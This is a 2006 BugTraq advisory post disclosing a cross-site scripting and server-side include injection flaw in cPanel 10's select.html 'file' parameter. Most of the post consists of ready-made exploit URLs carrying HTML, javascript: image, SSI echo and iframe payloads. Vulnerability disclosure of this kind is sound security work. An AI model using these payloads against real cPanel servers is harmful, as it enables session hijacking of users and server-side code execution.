BugTraq
XSS in Cpanel 10 Jun 26 2006 03:36AM
preth00nker gmail com
A new vulnerability was found in Cpanel V.10;

It happen cause the variable *&File* of the *select.html* file (in the edit-zone) just filter the <script>'s labels and the possibility can by open to other labels like

*Server Side Include,

*HMTL labels...

*including Javascript expressed in other ways

An attacker can use this vuln. for execute remote scripts in the browser of clients and take advantage of this for hijacking a session or execute SSI code in the own server

Exploit & Examples:

[+] Exploit:

http://[Target]:[Port]/[Dir]/x/files/select.html?dir=/&file= <h1><b>Your code here!!</b></h1>

[+] Javascript:

http://[Target]:2082/frontend/x/files/select.html?dir=/&file=<IMG src="javascript:alert('yeah');">

[+] Server Side Inclusion

http://[Target]:2082/frontend/x/files/select.html?dir=/&file=<!--#echo var="HTTP_REFERER" -->

[+] HTML

http://[Target]:2082/frontend/x/files/select.html?dir=/&file=<IFRAME SRC="index.html">

________________________________________________

discovery by the staff of http://MexHackTeam.org

By Preth00nker

Preth00nker [at] gmail [dot] com

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus